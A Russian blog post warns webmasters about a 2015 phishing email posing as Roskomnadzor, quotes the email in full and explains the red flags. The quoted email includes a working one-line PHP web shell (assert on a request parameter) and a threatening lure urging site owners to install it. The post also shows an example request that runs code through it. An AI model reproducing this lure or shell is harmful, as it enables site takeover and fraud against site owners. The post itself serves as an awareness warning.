Мошенники под видом Роскомнадзора

Осторожно, мошенники!

Вебмастера, блогеры, владельцы сайтов! Осторожно, мошенники под видом Роскомнадзора!

Прошу прощения за небольшой оффтоп, но, думаю, многим здесь приведенная ниже информация будет полезна.

Вчера по поводу одного сайта, посещаемость которого близка к 3000 уников в день, то есть он подпадает под закон о «блогерах», пришло якобы от Роскомнадзора вот такое письмо:

Мошенники под видом Роскомнадзора

27.08.2015, 00:22, «Роскомнадзор» <zapret-info@roskomnadzor.org>:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени САЙТ в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт САЙТ был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени САЙТ, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени САЙТ*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: САЙТ/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени САЙТ, следую инструкции указанной выше, то Ваш сайт САЙТ будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

Ужасно то, что его могут воспринять за чистую монету, как и человек, который мне его переслал.

Но:

  • Во-первых, оно отправлено с сайта roskomnadzor.org, а на rkn.gov.ru, а то что с первого на второй ведет редирект ещё ни о чем не говорит.
  • Во-вторых, и это основное, вас просят разместить на сайте php код а это само по себе подозрительно. Дело в том, что ни Яндекс, ни Google, ни для подтверждения прав на домены, ни для счетчиков посещений, ни для чего ещё не просят разместить вас php. А тут вдруг Роскомнадзору без этого никак.
  • В-третьих, давайте посмотрим на сам код. Дело в том, что конструкция assert(stripslashes($_REQUEST[roskomnadzor])); позволит посторонним личностям запустить на вашем хостинге php код, который они будут передавать через переменную запроса. Например переход по адресу site.ru/reestr/reestr-id128032.php?roskomnadzor=print(«Hello World!») запустит выполнение php команды print(«Hello World!»). Пример у меня конечно получился не сильно страшный, но факт остается фактом: позволять кому-то запускать php на своем сервере нельзя, потому что тогда они могут сделать на сервере почти всё, что захотят. Например удалить все файлы и почистить все базы данных, сменить админские пароли на вашем сайте, внедрить на сайт какой-нибудь вредоносный код и т.д. и т.п.
  • В-четверных, на настоящем сайте Роскомнадзора уже висит новость о мошенниках: http://rkn.gov.ru/news/rsoc/news34336.htm
  • Ну и напоследок: Ну кто в Роскомнадзоре будет письма в 00:22 слать?

В общем будьте внимательны, не попадайтесь на уловки мошенников, дружите с головой и никогда не размещайте на своих сайтах php код из непонятных писем.

Всем добра!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *